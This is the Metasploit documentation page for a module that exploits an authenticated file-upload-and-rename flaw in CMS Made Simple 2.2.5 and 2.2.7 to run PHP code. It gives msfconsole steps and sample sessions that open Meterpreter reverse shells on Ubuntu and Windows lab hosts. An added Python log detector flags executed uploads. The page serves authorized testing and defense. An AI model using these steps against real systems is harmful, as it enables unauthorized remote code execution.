metasploit-gs/documentation/modules/exploit/multi/http/cmsms_upload_rename_rce.md
2018-07-19 18:26:42 +00:00

Description

CMS Made Simple allows an authenticated administrator to upload a file and rename it to have a .php extension. The file can then be executed by opening the URL of the file in the /uploads/ directory.

This module has been successfully tested on CMS Made Simple versions 2.2.5 and 2.2.7.
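As an added defensive example, not part of the module or its documentation, the following Python flags requests in Apache combined-format access logs that fetch a PHP-executable file from the /uploads/ directory, which is the execution step the description above relies on. The log lines are constructed samples, and the upload prefix and extension list are assumptions rather than values from the page.

```python
import re
from urllib.parse import urlsplit

# Constructed sample lines in Apache "combined" format (not taken from the page).
SAMPLE_LOG = """\
172.22.222.194 - - [17/Jul/2018:08:41:31 -0500] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
172.22.222.194 - - [17/Jul/2018:08:41:32 -0500] "GET /uploads/images/logo.png HTTP/1.1" 200 8821 "-" "Mozilla/5.0"
172.22.222.194 - - [17/Jul/2018:08:41:33 -0500] "GET /uploads/shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
172.22.222.194 - - [17/Jul/2018:08:41:34 -0500] "POST /uploads/a.PHP?x=1 HTTP/1.1" 404 12 "-" "curl/7.58"
"""

# Minimal parser for the combined log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Extensions a typical Apache/PHP handler mapping will execute (assumed list).
EXEC_EXT = re.compile(r'\.(php|phtml|php[3457]|phar)$', re.IGNORECASE)

def parse_line(line):
    """Return the fields we care about as a dict, or None for unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = urlsplit(rec["target"]).path  # drop any query string
    return rec

def find_upload_exec(log_text, upload_prefix="/uploads/"):
    """Flag requests for PHP-executable files beneath the uploads directory.

    'served' records whether the server answered 2xx, i.e. whether a renamed
    upload was actually executed rather than merely probed for.
    """
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["path"].startswith(upload_prefix) and EXEC_EXT.search(rec["path"]):
            hits.append({
                "ip": rec["ip"],
                "time": rec["ts"],
                "path": rec["path"],
                "served": rec["status"].startswith("2"),
            })
    return hits
```

Run it over a real access log with `find_upload_exec(open(path).read())`; a hit with `served` true is the point at which to pull the file from the uploads directory for review.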

Vulnerable Application

CMS Made Simple v2.2.5

Verification Steps

  1. ./msfconsole -q
  2. use exploit/multi/http/cmsms_upload_rename_rce
  3. set username <username>
  4. set password <password>
  5. set rhosts <rhost>
  6. run

Scenarios

CMS Made Simple v2.2.5 on Ubuntu 18.04 (PHP 7.2.7, Apache 2.4.9)

msf5 > use exploit/multi/http/cmsms_upload_rename_rce
msf5 exploit(multi/http/cmsms_upload_rename_rce) > set username msfdev
username => msfdev
msf5 exploit(multi/http/cmsms_upload_rename_rce) > set password msfdev
password => msfdev
msf5 exploit(multi/http/cmsms_upload_rename_rce) > set rhosts 172.22.222.123
rhosts => 172.22.222.123
msf5 exploit(multi/http/cmsms_upload_rename_rce) > run

[*] Started reverse TCP handler on 172.22.222.194:4444 
[*] Sending stage (37775 bytes) to 172.22.222.123
[*] Meterpreter session 1 opened (172.22.222.194:4444 -> 172.22.222.123:44352) at 2018-07-17 08:41:33 -0500

meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.15.0-23-generic #25-Ubuntu SMP Wed May 23 18:02:16 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter >

CMS Made Simple v2.2.5 on Windows 10 x64 (PHP 5.6.35, Apache 2.4.33)

msf5 > use exploit/multi/http/cmsms_upload_rename_rce
msf5 exploit(multi/http/cmsms_upload_rename_rce) > set username msfdev
username => msfdev
msf5 exploit(multi/http/cmsms_upload_rename_rce) > set password msfdev
password => msfdev
msf5 exploit(multi/http/cmsms_upload_rename_rce) > set rhosts 172.22.222.175
rhosts => 172.22.222.175
msf5 exploit(multi/http/cmsms_upload_rename_rce) > run

[*] Started reverse TCP handler on 172.22.222.194:4444 
[*] Sending stage (37775 bytes) to 172.22.222.175
[*] Meterpreter session 1 opened (172.22.222.194:4444 -> 172.22.222.175:49829) at 2018-07-17 08:46:27 -0500

meterpreter > sysinfo
Computer    : WIN10
OS          : Windows NT WIN10 10.0 build 17134 (Windows 10) AMD64
Meterpreter : php/windows
meterpreter >